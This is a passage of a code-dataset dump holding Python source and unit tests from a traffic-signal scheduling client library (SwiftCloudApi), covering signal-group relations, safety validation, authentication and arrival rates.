float(seconds)\n\n # validate values of arguments\n self._validate()\n\n def to_json(self) -> Dict:\n \"\"\"get dictionary structure that can be stored as json with json.dumps()\"\"\"\n return {\"from_id\": self.from_id, \"from_start_gy\": True,\n \"to_id\": self.to_id, \"to_start_gy\": True,\n \"min_time\": self.seconds, \"max_time\": self.seconds, \"same_start_phase\": False}\n\n @staticmethod\n def from_json(offset_dict: Dict) -> Offset:\n \"\"\"Loading offset from json (expected same json structure as generated with to_json)\"\"\"\n assert offset_dict[\"min_time\"] == offset_dict[\"max_time\"], \\\n \"trying to load Offset from dictionary, but the provided dictionary is not an offset!\"\n return Offset(from_id=offset_dict[\"from_id\"],\n to_id=offset_dict[\"to_id\"],\n seconds=offset_dict[\"min_time\"])\n\n def _validate(self):\n \"\"\" Validate input arguments of Offset \"\"\"\n if not self.from_id != self.to_id:\n raise ValueError(\"ids of offset must be different\")\n\n\nclass GreenyellowLead:\n def __init__(self, from_id: str, to_id: str, min_seconds: float, max_seconds: float) -> None:\n \"\"\"\n A greenyellow-lead is the time from signal group \"from_id\" starting its greenyellow interval to signal group \"to_id\"\n starting its greenyellow interval; for example a green-lead of at least 5 seconds and at most 10 seconds\n of sg28 with regards to sg1 means that sg28 must start its greenyellow interval\n at least 5 seconds and at most 10 seconds before SG1 starts it greenyellow interval.\n :param from_id:\n :param to_id:\n :param min_seconds: lower bound on the allowed duration of the greenyellow-lead\n :param max_seconds: upper bound on the allowed duration of the greenyellow-lead\n \"\"\"\n # by converting to the correct data type we ensure correct types are used\n self.from_id = str(from_id)\n self.to_id = str(to_id)\n self.min_seconds = float(min_seconds)\n self.max_seconds = float(max_seconds)\n\n # validate values of arguments\n self._validate()\n\n def to_json(self) -> Dict:\n \"\"\"get dictionary structure that can be stored as json with json.dumps()\"\"\"\n return {\"from_id\": self.from_id, \"from_start_gy\": True,\n \"to_id\": self.to_id, \"to_start_gy\": True,\n \"min_time\": self.min_seconds, \"max_time\": self.max_seconds,\n \"same_start_phase\": True}\n\n @staticmethod\n def from_json(json_dict: Dict) -> GreenyellowLead:\n \"\"\"Loading from json (expected same json structure as generated with to_json)\"\"\"\n return GreenyellowLead(from_id=json_dict[\"from_id\"],\n to_id=json_dict[\"to_id\"],\n min_seconds=json_dict[\"min_time\"],\n max_seconds=json_dict[\"max_time\"])\n\n def _validate(self):\n \"\"\" Validate input arguments of GreenyellowLead \"\"\"\n if not self.from_id != self.to_id:\n raise ValueError(\"ids of GreenyellowLead must be different\")\n\n if not self.max_seconds >= self.min_seconds:\n raise ValueError(\"max_greenyellow_lead should exceed (or equal) min_greenyellow_lead\")\n\n\nclass GreenyellowTrail:\n def __init__(self, from_id: str, to_id: str, min_seconds: float, max_seconds: float) -> None:\n \"\"\"\n A greenyellow-trail is the time from signal group \"from_id\" ending its greenyellow interval to signal group \"to_id\"\n ending its greenyellow interval; for example a green-trail of at least 5 seconds and at most 10 seconds\n of sg1 with regards to sg28 means that sg1 must end its greenyellow interval\n at least 5 seconds and at most 10 seconds before SG28 ends it greenyellow interval.\n :param from_id:\n :param to_id:\n :param min_seconds: lower bound on the allowed duration of the greenyellow-trail\n :param max_seconds: upper bound on the allowed duration of the greenyellow-trail\n \"\"\"\n # by converting to the correct data type we ensure correct types are used\n self.from_id = str(from_id)\n self.to_id = str(to_id)\n self.min_seconds = float(min_seconds)\n self.max_seconds = float(max_seconds)\n\n # validate values of arguments\n self._validate()\n\n def to_json(self) -> Dict:\n \"\"\"get dictionary structure that can be stored as json with json.dumps()\"\"\"\n return {\"from_id\": self.from_id, \"from_start_gy\": False,\n \"to_id\": self.to_id, \"to_start_gy\": False,\n \"min_time\": self.min_seconds, \"max_time\": self.max_seconds,\n \"same_start_phase\": True}\n\n @staticmethod\n def from_json(json_dict: Dict) -> GreenyellowTrail:\n \"\"\"Loading from json (expected same json structure as generated with to_json)\"\"\"\n return GreenyellowTrail(from_id=json_dict[\"from_id\"],\n to_id=json_dict[\"to_id\"],\n min_seconds=json_dict[\"min_time\"],\n max_seconds=json_dict[\"max_time\"])\n\n def _validate(self):\n \"\"\" Validate input arguments of GreenyellowTrail \"\"\"\n if not self.from_id != self.to_id:\n raise ValueError(\"ids of GreenyellowTrail must be different\")\n\n if not self.max_seconds >= self.min_seconds:\n raise ValueError(\"max_greenyellow_lead should exceed (or equal) min_greenyellow_trail\")\n"
},
{
"alpha_fraction": 0.7998903393745422,
"alphanum_fraction": 0.8015350699424744,
"avg_line_length": 69.15384674072266,
"blob_id": "7d8059b7afd5d6c9f9948ac1889178c8a8504377",
"content_id": "39abb2ca3dacb04c99f9108d126a09ef92f5c7d4",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1824,
"license_type": "permissive",
"max_line_length": 111,
"num_lines": 26,
"path": "/swift_cloud_py/validate_safety_restrictions/validate.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "from swift_cloud_py.entities.control_output.fixed_time_schedule import FixedTimeSchedule\nfrom swift_cloud_py.entities.intersection.intersection import Intersection\nfrom swift_cloud_py.validate_safety_restrictions.validate_bounds import validate_bounds\nfrom swift_cloud_py.validate_safety_restrictions.validate_completeness import validate_completeness\nfrom swift_cloud_py.validate_safety_restrictions.validate_conflicts import validate_conflicts\nfrom swift_cloud_py.validate_safety_restrictions.validate_fixed_orders import validate_fixed_orders\nfrom swift_cloud_py.validate_safety_restrictions.validate_other_sg_relations import validate_other_sg_relations\n\n\ndef validate_safety_restrictions(intersection: Intersection, fixed_time_schedule: FixedTimeSchedule,\n tolerance: float = 10**(-2)) -> None:\n \"\"\"\n Check if the fixed-time schedule satisfies the safety restrictions such as bounds on greenyellow times\n and bounds on red times.\n :param intersection: intersection object (this object also contains safety restrictions that a\n fixed-time schedule should satisfy)\n :param fixed_time_schedule: the schedule that we would like to validate\n :param tolerance: tolerance in seconds for violating safety restrictions\n\n This method raises a SafetyViolation-exception if the safety restrictions are not satisfied.\n \"\"\"\n validate_bounds(intersection=intersection, fts=fixed_time_schedule, tolerance=tolerance)\n validate_conflicts(intersection=intersection, fts=fixed_time_schedule, tolerance=tolerance)\n validate_other_sg_relations(intersection=intersection, fts=fixed_time_schedule, tolerance=tolerance)\n validate_completeness(intersection=intersection, fts=fixed_time_schedule)\n validate_fixed_orders(intersection=intersection, fts=fixed_time_schedule)\n"
},
{
"alpha_fraction": 0.6226993799209595,
"alphanum_fraction": 0.630014181137085,
"avg_line_length": 43.14583206176758,
"blob_id": "0d165e964441b323d680d2ffe8e2133785632579",
"content_id": "7c0ef3c3b99f1a9d3885cb892516cd8fb9d3b4d0",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4238,
"license_type": "permissive",
"max_line_length": 118,
"num_lines": 96,
"path": "/swift_cloud_py/authentication/authentication.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import logging\nfrom collections import Callable\nfrom time import time\n\nimport requests\n\nfrom swift_cloud_py.common.errors import UnauthorizedException, UnknownAuthenticationException, \\\n NoInternetConnectionException, BadRequestException\nfrom swift_cloud_py.authentication.check_internet_connection import has_internet_connection\nfrom swift_cloud_py.authentication.credentials import Credentials\n\n\nAUTHENTICATION_URL = \"https://authentication.swiftmobility.eu/authenticate\"\n\n\nclass Authentication:\n \"\"\"\n Class to retrieve authentication token (jwt token).\n \"\"\"\n _credentials = Credentials() # credentials from environment variables\n _jwt_token = None # last retrieved jwt token\n _exp = time() # time at which the token expires (in seconds starting from January 1, 1970, 00:00:00 (UTC))\n\n @classmethod\n def get_authentication_token(cls) -> str:\n \"\"\" get a valid jwt token\n return: jwt-token\n \"\"\"\n # if authentication token not yet set or almost expired\n if cls._jwt_token is None or time() + 30 > cls._exp:\n cls.update_authentication_token()\n\n return Authentication._jwt_token\n\n @classmethod\n def update_authentication_token(cls) -> None:\n \"\"\"\n update the jwt token (store the info in _jwt_token and _exp)\n :return: -\n \"\"\"\n # check if credentials are set (via environment variables)\n if cls._credentials.access_key is None:\n raise UnauthorizedException(\"Environment variable smc_api_key is not set\")\n elif cls._credentials.secret_access_key is None:\n raise UnauthorizedException(\"Environment variable smc_api_secret is not set\")\n try:\n logging.debug(\"updating authentication token\")\n r = requests.post(url=AUTHENTICATION_URL,\n json={\"accessKey\": cls._credentials.access_key,\n \"secretAccessKey\": cls._credentials.secret_access_key,\n \"accountType\": \"cloud-api\"})\n logging.debug(\"authentication token updated\")\n except requests.exceptions.ConnectionError: # no connection could be established\n if has_internet_connection():\n logging.debug(\"updating authentication token failed: unknown exception\")\n raise UnknownAuthenticationException\n else:\n logging.debug(\"updating authentication token failed: no internet!\")\n raise NoInternetConnectionException\n\n if r.status_code != 200:\n # no success; here we also catch the errors {\"error\": {\"code\": status_code, \"message\": error_message}}\n if not has_internet_connection():\n raise NoInternetConnectionException\n elif r.status_code == 401:\n raise UnauthorizedException(\"Access was denied; check if the environment variables 'smc_api_key' and \"\n \"'smc_secret_key' are correctly set. If still not working, send \"\n \"a mail to [email protected]\")\n elif r.status_code == 400:\n # error status_codes:\n # 400: wrong input\n # 403: not authorized\n # 500: server error\n raise BadRequestException # incorrect json format send to endpoint\n else:\n raise UnknownAuthenticationException\n else:\n # store info of new token\n json_dict = r.json()\n cls._jwt_token = json_dict[\"jwt-token\"]\n cls._exp = int(json_dict[\"exp\"])\n\n\ndef authenticate(func: Callable) -> Callable:\n \"\"\"\n wrapper function that can be used as a decorator around the methods of SwiftMobilityCloudApi; it ensures that the\n _authentication_token field of SwiftMobilityCloudApi is up-to-date.\n :param func: method of SwiftMobilityCloudApi\n :return: wrapped method\n \"\"\"\n # args and kwargs to allow for methods that have multiple named and unnamed arguments\n def wrapper(api, *args, **kwargs):\n api._authentication_token = Authentication.get_authentication_token()\n return func(api, *args, **kwargs)\n\n return wrapper\n"
},
{
"alpha_fraction": 0.5753846168518066,
"alphanum_fraction": 0.6146606206893921,
"avg_line_length": 36.33108139038086,
"blob_id": "a1f74df1ad4f97e2f724b3341e5c2ddaed672d5d",
"content_id": "d7ea2eb756ecba1ca77b463c8644ae476badea68",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5525,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 148,
"path": "/swift_cloud_py/entities/scenario/test/test_arrival_rates.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom typing import Dict\n\nfrom swift_cloud_py.entities.scenario.arrival_rates import ArrivalRates\n\n\nclass TestInputValidation(unittest.TestCase):\n\n @staticmethod\n def get_default_inputs() -> Dict:\n \"\"\" Function to get default (valid) inputs for ArrivalRates() \"\"\"\n return dict(id_to_arrival_rates={\"1\": [1000, 950], \"2\": [850, 700]})\n\n def test_successful_validation(self) -> None:\n \"\"\" Test initializing ArrivalRates object with correct input \"\"\"\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n\n # WHEN\n ArrivalRates(**input_dict)\n\n # THEN no error should be raised\n\n def test_no_dict(self) -> None:\n \"\"\" Test providing no dictionary for id_to_arrival_rates\"\"\"\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[\"id_to_arrival_rates\"] = 1\n\n with self.assertRaises(ValueError):\n # WHEN initializing the arrival rates\n ArrivalRates(**input_dict)\n\n # THEN an error should be raised\n\n def test_no_string_values(self) -> None:\n \"\"\" Test providing no string as id in id_to_arrival_rates\"\"\"\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[\"id_to_arrival_rates\"][1] = [1, 2] # add value (1) which is not a string\n\n with self.assertRaises(ValueError):\n # WHEN initializing the arrival rates\n ArrivalRates(**input_dict)\n\n # THEN an error should be raised\n\n def test_no_list_for_rates(self) -> None:\n \"\"\" Test providing no list as value in id_to_arrival_rates\"\"\"\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[\"id_to_arrival_rates\"][\"3\"] = 1 # rates is not a list\n\n with self.assertRaises(ValueError):\n # WHEN initializing the arrival rates\n ArrivalRates(**input_dict)\n\n # THEN an error should be raised\n\n def test_rate_no_number(self) -> None:\n \"\"\" Test providing no numbers for the rates \"\"\"\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n input_dict[\"id_to_arrival_rates\"][\"3\"] = [1, \"3\"] # rates is not a list of numbers\n\n with self.assertRaises(ValueError):\n # WHEN initializing the arrival rates\n ArrivalRates(**input_dict)\n\n # THEN an error should be raised\n\n\nclass TestOperations(unittest.TestCase):\n\n def test_multiply(self) -> None:\n \"\"\" Test multiplying ArrivalRates \"\"\"\n # GIVEN\n arrival_rates1 = ArrivalRates(id_to_arrival_rates={\"1\": [1000, 950], \"2\": [850, 700]})\n\n # WHEN\n arrival_rates1 *= 1.3\n\n # THEN\n self.assertListEqual(arrival_rates1.id_to_arrival_rates[\"1\"], [1000 * 1.3, 950 * 1.3])\n self.assertListEqual(arrival_rates1.id_to_arrival_rates[\"2\"], [850 * 1.3, 700 * 1.3])\n\n def test_multiply_wrong_type(self) -> None:\n \"\"\" Test multiplying ArrivalRates with non-numeric value \"\"\"\n # GIVEN\n arrival_rates1 = ArrivalRates(id_to_arrival_rates={\"1\": [1000, 950], \"2\": [850, 700]})\n\n with self.assertRaises(ArithmeticError):\n # WHEN\n arrival_rates1 * \"string\"\n\n # THEN an exception should be raised\n\n def test_add(self) -> None:\n \"\"\" Test adding two ArrivalRates \"\"\"\n # GIVEN\n arrival_rates1 = ArrivalRates(id_to_arrival_rates={\"1\": [1000, 950], \"2\": [850, 700]})\n arrival_rates2 = ArrivalRates(id_to_arrival_rates={\"1\": [642, 230], \"2\": [600, 355]})\n\n # WHEN\n arrival_rates1 += arrival_rates2\n\n # THEN\n self.assertListEqual(arrival_rates1.id_to_arrival_rates[\"1\"], [1000 + 642, 950 + 230])\n self.assertListEqual(arrival_rates1.id_to_arrival_rates[\"2\"], [850 + 600, 700 + 355])\n\n def test_add_different_ids(self) -> None:\n \"\"\" Test adding two ArrivalRates with different ids \"\"\"\n # GIVEN\n arrival_rates1 = ArrivalRates(id_to_arrival_rates={\"1\": [1000, 950], \"2\": [850, 700]})\n arrival_rates2 = ArrivalRates(id_to_arrival_rates={\"1\": [642, 230], \"3\": [600, 355]})\n\n with self.assertRaises(ArithmeticError):\n # WHEN adding to rates with different ids\n arrival_rates1 + arrival_rates2\n\n # THEN an assertion should be raised\n\n def test_add_different_lengths(self) -> None:\n \"\"\" Test adding two ArrivalRates with different number of rates \"\"\"\n # GIVEN\n arrival_rates1 = ArrivalRates(id_to_arrival_rates={\"1\": [1000, 950], \"2\": [850, 700]})\n arrival_rates2 = ArrivalRates(id_to_arrival_rates={\"1\": [642, 230], \"2\": [600, 355, 800]})\n\n with self.assertRaises(ArithmeticError):\n # WHEN adding to rates with different ids\n arrival_rates1 + arrival_rates2\n\n # THEN an assertion should be raised\n\n\nclass TestJsonConversion(unittest.TestCase):\n def test_json_back_and_forth(self) -> None:\n \"\"\" test converting back and forth from and to json \"\"\"\n # GIVEN\n input_dict = TestInputValidation.get_default_inputs()\n\n # WHEN\n arrival_rates = ArrivalRates(**input_dict)\n\n # THEN converting back and forth should in the end give the same result\n arrival_rates_dict = arrival_rates.to_json()\n arrival_rates_from_json = ArrivalRates.from_json(arrival_rates_dict=arrival_rates_dict)\n self.assertDictEqual(arrival_rates_dict, arrival_rates_from_json.to_json())\n"
},
{
"alpha_fraction": 0.7058823704719543,
"alphanum_fraction": 0.7058823704719543,
"avg_line_length": 22.634145736694336,
"blob_id": "541c4668764092ee9a0f65604eb256b949544136",
"content_id": "3af86373a8205c248ca865444f5cc92c5e882bfe",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 969,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 41,
"path": "/swift_cloud_py/common/errors.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "class NoInternetConnectionException(Exception):\n \"\"\"\n Exception indicating no internet connection is present\n \"\"\"\n pass\n\n\nclass UnauthorizedException(Exception):\n \"\"\"\n Exception to indicate that access is denied to the cloud api.\n \"\"\"\n pass\n\n\nclass UnknownAuthenticationException(Exception):\n \"\"\"\n Exception to indicate that something went wrong in the cloud during authentication;\n possibly an unexpected error was raised in the cloud.\n \"\"\"\n pass\n\n\nclass UnknownCloudException(Exception):\n \"\"\"\n Exception to indicate that something went wrong in the cloud; possibly an unexpected error was raised in the cloud.\n \"\"\"\n pass\n\n\nclass BadRequestException(Exception):\n \"\"\"\n Exception to indicate that the input to the rest-api was incorrect.\n \"\"\"\n pass\n\n\nclass SafetyViolation(Exception):\n \"\"\"\n Exception that is raised when a fixed-time schedule does not satisfy all safety restrictions\n \"\"\"\n pass\n"
},
{
"alpha_fraction": 0.6385863423347473,
"alphanum_fraction": 0.6394754648208618,
"avg_line_length": 41.046730041503906,
"blob_id": "9bfeebbdbe58f10edc6e0e268fa4c258466ff948",
"content_id": "3e75247e48c2250d2b67eb5a96e71c7ec8fa18b3",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4499,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 107,
"path": "/swift_cloud_py/entities/control_output/phase_diagram.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "from __future__ import annotations # allows using a class as typing inside the same class\nfrom typing import List\n\n\ndef sort_by_name(name: str):\n \"\"\" function needed to sort signal groups by name \"\"\"\n return len(name), name\n\n\nclass GreenYellowPhase:\n def __init__(self, signalgroup_id: str, interval_index: int) -> None:\n \"\"\"\n Refers to the (interval_index + 1)th greenyellow interval of the signal group with id signalgroup_id\n :param signalgroup_id:\n :param interval_index:\n \"\"\"\n # explicit type conversion ensures correct types are used\n self.signalgroup_id = str(signalgroup_id)\n self.interval_index = int(interval_index)\n\n def to_json(self) -> List:\n \"\"\"get json-serializable structure that can be stored as json with json.dumps()\"\"\"\n return [self.signalgroup_id, self.interval_index]\n\n @staticmethod\n def from_json(json_list: List) -> GreenYellowPhase:\n \"\"\"Loading greenyellow phase from json (expected same json structure as generated with to_json)\"\"\"\n return GreenYellowPhase(signalgroup_id=json_list[0], interval_index=json_list[1])\n\n def __str__(self):\n \"\"\"string representation of object\"\"\"\n return f\"(id={self.signalgroup_id}, index={self.interval_index})\"\n\n\nclass Phase:\n def __init__(self, greenyellow_phases: List[GreenYellowPhase]) -> None:\n \"\"\"A phase represents a number of greenyellow intervals that (may) occur at the same time\"\"\"\n self.greenyellow_phases = greenyellow_phases\n\n self._validate()\n\n def to_json(self) -> List[List]:\n \"\"\"get json-serializable structure that can be stored as json with json.dumps()\"\"\"\n return [greenyellow_phase.to_json() for greenyellow_phase in self.greenyellow_phases]\n\n @staticmethod\n def from_json(phase_list: List[List]) -> Phase:\n \"\"\"Loading phase from json (expected same json structure as generated with to_json)\"\"\"\n return Phase(greenyellow_phases=[GreenYellowPhase.from_json(greenyellow_phase)\n for greenyellow_phase in phase_list])\n\n def _validate(self):\n \"\"\" Validate arguments of Phase object\"\"\"\n error_message = \"greenyellow_phases should be a list of GreenYellowPhase-objects\"\n if not isinstance(self.greenyellow_phases, list):\n raise ValueError(error_message)\n for greenyellow_phase in self.greenyellow_phases:\n if not isinstance(greenyellow_phase, GreenYellowPhase):\n raise ValueError(error_message)\n\n def __str__(self) -> str:\n \"\"\"string representation of object\"\"\"\n string = \"[\"\n # visualize in sorted (by name) order\n greenyellow_phases = sorted(self.greenyellow_phases,\n key=lambda _greenyellow_phase: sort_by_name(_greenyellow_phase.signalgroup_id))\n for index, greenyellow_phase in enumerate(greenyellow_phases):\n if index > 0:\n string += \", \"\n string += str(greenyellow_phase)\n string += \"]\"\n return string\n\n\nclass PhaseDiagram:\n def __init__(self, phases: List[Phase]) -> None:\n \"\"\"A phasediagram is a sequence of periodically repeating Phases; a phase diagram specifies the sequence in\n which the signal groups receive a greenyellow interval. \"\"\"\n self.phases = phases\n\n self._validate()\n\n def to_json(self) -> List[List[List]]:\n \"\"\"get json_serializable structure that can be stored as json with json.dumps()\"\"\"\n return [phase.to_json() for phase in self.phases]\n\n @staticmethod\n def from_json(phase_lists: List[List[List]]) -> PhaseDiagram:\n \"\"\"Loading phase diagram from json (expected same json structure as generated with to_json)\"\"\"\n return PhaseDiagram(phases=[Phase.from_json(phase_list=phase_list) for phase_list in phase_lists])\n\n def _validate(self):\n \"\"\" Validate arguments of PhaseDiagram object\"\"\"\n error_message = \"phases should be a list of Phase-objects\"\n if not isinstance(self.phases, list):\n raise ValueError(error_message)\n for phase in self.phases:\n if not isinstance(phase, Phase):\n raise ValueError(error_message)\n\n def __str__(self) -> str:\n \"\"\"string representation of object\"\"\"\n string = f\"phase diagram:\"\n for phase in self.phases:\n string += \"\\n\"\n string += f\"\\t{str(phase)}\"\n return string\n"
},
{
"alpha_fraction": 0.633230447769165,
"alphanum_fraction": 0.633230447769165,
"avg_line_length": 45.28571319580078,
"blob_id": "64942b144ddad7e5f8107df5bb3b52c7342526a0",
"content_id": "17c74b68122198f9aa0d35bdbcba7307d57f7549",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3888,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 84,
"path": "/swift_cloud_py/entities/scenario/arrival_rates.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "from __future__ import annotations # allows using ArrivalRates-typing inside ArrivalRates-class\n\nimport json\nfrom typing import Dict, List\n\n\nclass ArrivalRates:\n \"\"\"Arrival rates of all traffic lights\"\"\"\n def __init__(self, id_to_arrival_rates: Dict[str, List[float]]) -> None:\n \"\"\"\n :param id_to_arrival_rates: mapping of signalgroup id to a list of arrival rates for the associated traffic\n lights (in signalgroup.traffic_lights)\n return: -\n \"\"\"\n self.id_to_arrival_rates = id_to_arrival_rates\n\n # validate inputs\n self._validate()\n\n def to_json(self):\n \"\"\"get dictionary structure that can be stored as json with json.dumps()\"\"\"\n return self.id_to_arrival_rates\n\n @staticmethod\n def from_json(arrival_rates_dict) -> ArrivalRates:\n \"\"\"Loading arrival rates from json (expected same json structure as generated with to_json)\"\"\"\n return ArrivalRates(id_to_arrival_rates=arrival_rates_dict)\n\n @staticmethod\n def from_swift_mobility_export(json_path) -> ArrivalRates:\n \"\"\"\n Loading arrival rates from json-file exported from Swift Mobility Desktop\n :param json_path: path to json file\n :return: intersection object\n \"\"\"\n with open(json_path, \"r\") as f:\n json_dict = json.load(f)\n\n return ArrivalRates.from_json(arrival_rates_dict=json_dict[\"arrival_rates\"])\n\n def _validate(self) -> None:\n \"\"\" Validate input arguments of ArrivalRates; raises ValueError if validation does not pass\"\"\"\n # validate structure of id_to_arrival_rates\n error_message = \"id_to_arrival_rates should be a dictionary mapping from a signal group id (str) to \" \\\n \"a list of arrival rates (List[float])\"\n if not isinstance(self.id_to_arrival_rates, dict):\n raise ValueError(error_message)\n for _id, rates in self.id_to_arrival_rates.items():\n if not isinstance(_id, str):\n raise ValueError(error_message)\n if not isinstance(rates, list):\n raise ValueError(error_message)\n for rate in rates:\n if not isinstance(rate, (float, int)):\n raise ValueError(error_message)\n\n def __add__(self, other: ArrivalRates):\n \"\"\" add two arrival rates \"\"\"\n if not isinstance(other, ArrivalRates):\n raise ArithmeticError(\"can only add ArrivalRates object to ArrivalRates\")\n other_id_to_arrival_rates = other.id_to_arrival_rates\n\n # validate inputs\n other_ids = {_id for _id in other_id_to_arrival_rates}\n other_id_to_num_rates = {_id: len(rates) for _id, rates in other_id_to_arrival_rates.items()}\n ids = {_id for _id in self.id_to_arrival_rates}\n id_to_num_rates = {_id: len(rates) for _id, rates in self.id_to_arrival_rates.items()}\n if not ids == other_ids:\n raise ArithmeticError(\"when adding two ArrivalRates they should have the same ids\")\n if not id_to_num_rates == other_id_to_num_rates:\n raise ArithmeticError(\"when adding two ArrivalRates all rates should have equal length\")\n\n id_to_arrival_rates = \\\n {id_: [rate + other_rate for rate, other_rate in zip(rates, other_id_to_arrival_rates[id_])]\n for id_, rates in self.id_to_arrival_rates.items()}\n return ArrivalRates(id_to_arrival_rates=id_to_arrival_rates)\n\n def __mul__(self, factor: float):\n \"\"\" Multiply the arrival rates with a factor \"\"\"\n if not isinstance(factor, (float, int)):\n raise ArithmeticError(\"can only multiply ArrivalRates object with a float\")\n id_to_arrival_rates = \\\n {id_: [rate * factor for rate in rates] for id_, rates in self.id_to_arrival_rates.items()}\n return ArrivalRates(id_to_arrival_rates=id_to_arrival_rates)\n"
},
{
"alpha_fraction": 0.6376193761825562,
"alphanum_fraction": 0.6440919041633606,
"avg_line_length": 36.371681213378906,
"blob_id": "6be4592687983a582b7b54c9a948c3c6d7fd70f9",
"content_id": "b4336d472f62a6f7d054cb2c2e052c7b546de6a1",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-other-permissive"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 12669,
"license_type": "permissive",
"max_line_length": 117,
"num_lines": 339,
"path": "/swift_cloud_py/entities/intersection/test/test_sg_relations.py",
"repo_name": "stijnfleuren/SwiftCloudApi",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom typing import Dict\n\nfrom swift_cloud_py.entities.intersection.sg_relations import Conflict, SyncStart, Offset, GreenyellowLead, \\\n GreenyellowTrail\n\n\nclass TestConflictInputValidation(unittest.TestCase):\n\n @staticmethod\n def get_default_inputs() -> Dict:\n \"\"\" function to get default (valid) inputs for Conflict() \"\"\"\n return dict(id1=\"id1\", id2=\"id2\", setup12=1, setup21=2)\n\n def test_successful_validation(self) -> None:\n \"\"\" Test initializing Conflict object with correct input \"\"\"\n # GIVEN\n input_dict = TestConflictInputValidation.get_default_inputs()\n\n # WHEN\n Conflict(**input_dict)\n\n # THEN no exception should occur\n\n def test_wrong_datatype_for_ids(self) -> None:\n \"\"\" Test giving wrong datatype to Conflict for ids \"\"\"\n # GIVEN\n input_dict = TestConflictInputValidation.get_default_inputs()\n input_dict[\"id1\"] = 1\n input_dict[\"id2\"] = 2\n # WHEN initializing the conflict\n conflict = Conflict(**input_dict)\n\n # Should not give an error (datatype is converted to string)\n self.assertEqual(conflict.id1, \"1\")\n self.assertEqual(conflict.id2, \"2\")\n\n def test_wrong_datatype_for_numbers(self) -> None:\n \"\"\" Test giving wrong datatype to Conflict for numbers \"\"\"\n for key in [\"setup12\", \"setup21\"]:\n with self.subTest(f\"Wrong type in input '{key}'\"):\n # GIVEN\n input_dict = TestConflictInputValidation.get_default_inputs()\n input_dict[key] = 'string' # all arguments are numbers\n with self.assertRaises(ValueError):\n Conflict(**input_dict)\n\n # THEN an error should be raised\n\n def test_non_unique_ids(self) -> None:\n \"\"\" Test giving two identical ids to initialize a Conflict \"\"\"\n # GIVEN\n input_dict = TestConflictInputValidation.get_default_inputs()\n input_dict[\"id1\"] = \"1\"\n input_dict[\"id2\"] = \"1\"\n with self.assertRaises(ValueError):\n Conflict(**input_dict)\n\n # THEN an error should be raised\n\n def test_setup_sum_negative(self) -> None:\n \"\"\" Test sum of setups being negative \"\"\"\n # GIVEN\n input_dict = TestConflictInputValidation.get_default_inputs()\n input_dict[\"setup12\"] = 0\n input_dict[\"setup21\"] = -1\n with self.assertRaises(ValueError):\n Conflict(**input_dict)\n\n # THEN an error should be raised\n\n\nclass TestConflictJsonConversion(unittest.TestCase):\n def test_json_back_and_forth(self) -> None:\n \"\"\" test converting back and forth from and to json \"\"\"\n # GIVEN\n input_dict = TestConflictInputValidation.get_default_inputs()\n\n # WHEN\n conflict = Conflict(**input_dict)\n\n # THEN converting back and forth should in the end give the same result\n conflict_dict = conflict.to_json()\n conflict_from_json = Conflict.from_json(conflict_dict=conflict_dict)\n self.assertDictEqual(conflict_dict, conflict_from_json.to_json())\n\n\nclass TestSyncStartInputValidation(unittest.TestCase):\n\n @staticmethod\n def get_default_inputs() -> Dict:\n \"\"\" function to get default (valid) inputs for SyncStart() \"\"\"\n return dict(from_id=\"1\", to_id=\"2\")\n\n def test_successful_validation(self) -> None:\n \"\"\" Test initializing SyncStart object with correct input \"\"\"\n # GIVEN\n input_dict = TestSyncStartInputValidation.get_default_inputs()\n\n # WHEN\n SyncStart(**input_dict)\n\n # THEN no exception should occur\n\n def test_wrong_datatype_for_ids(self) -> None:\n \"\"\" Test giving wrong datatype to SyncStart for ids \"\"\"\n # GIVEN\n input_dict = TestSyncStartInputValidation.get_default_inputs()\n input_dict[\"from_id\"] = 1\n input_dict[\"to_id\"] = 2\n\n # WHEN initializing the synchronous start\n sync_start = SyncStart(**input_dict)\n\n # Should not give an error (datatype is converted to string); note that from_id and to_id might have swapped;\n # this is done to store this SyncStart in an unambiguous manner.\n self.assertSetEqual({sync_start.from_id, sync_start.to_id}, {\"1\", \"2\"})\n\n def test_non_unique_ids(self) -> None:\n \"\"\" Test giving two identical ids to initialize a SyncStart \"\"\"\n # GIVEN\n input_dict = TestSyncStartInputValidation.get_default_inputs()\n input_dict[\"from_id\"] = \"1\"\n input_dict[\"to_id\"] = \"1\"\n with self.assertRaises(ValueError):\n SyncStart(**input_dict)\n\n # THEN an error should be raised\n\n\nclass TestSyncStartJsonConversion(unittest.TestCase):\n def test_json_back_and_forth(self) -> None:\n \"\"\" test converting back and forth from and to json \"\"\"\n # 